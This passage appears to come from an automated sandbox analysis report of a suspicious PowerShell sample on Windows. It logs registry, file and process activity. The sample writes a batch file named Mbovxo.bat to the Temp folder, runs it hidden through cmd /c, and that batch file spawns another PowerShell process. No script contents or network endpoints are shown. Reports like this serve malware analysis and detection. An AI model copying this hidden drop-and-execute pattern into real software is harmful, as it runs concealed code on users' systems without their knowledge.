Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aDU0VK IWA5kLS	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aDU0VK IWA5kLS	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn

Thread 0xa10

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe		1	Fn

Thread 0xa1c

(Host: 13, Network: 0)

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	24	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat, type = file_type	2	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	8	Fn
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat, size = 332	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mbovxo.bat, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn

Thread 0xa20

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Process	Create	process_name = C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat, show_window = SW_HIDE		1	Fn

Process #4: cmd.exe

(Host: 111, Network: 0)

Information	Value
ID	#4
File Name	c:\windows\system32\cmd.exe
Command Line	cmd /c ""C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" "
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\Desktop\
Monitor	Start Time: 00:01:01, Reason: Child Process
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:01:25

OS Process Information

Information	Value
PID	0xa24
Parent PID	0x9f8 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A28

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x0010ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001b0000	0x001b0000	0x001bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002d0000	0x002d0000	0x003cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000470000	0x00470000	0x0056ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000570000	0x00570000	0x006f7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000700000	0x00700000	0x00880fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000890000	0x00890000	0x01c8ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001c90000	0x01c90000	0x01fd2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01fe0000	0x022aefff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e70000	0x49ec8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
winbrand.dll	0x7fef5a50000	0x7fef5a57fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefd860000	0x7fefd98cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefdb00000	0x7fefdbdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff5b0000	0x7feff5cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffda000	0x7fffffda000	0x7fffffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xa28

(Host: 96, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-09-25 20:33:03 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 94209	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e70000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77320000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77336d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aDU0VK IWA5kLS\Desktop	1	Fn
Environment	Get Environment String		1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77320000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x773323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77328290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x773317e0	1	Fn
File	Get Info	filename = "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat", type = file_attributes	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefdb00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefdb1e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefdb1f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefdb1f660	1	Fn
File	Create	filename = C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 332	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 32	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 10	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 321	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xa40, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
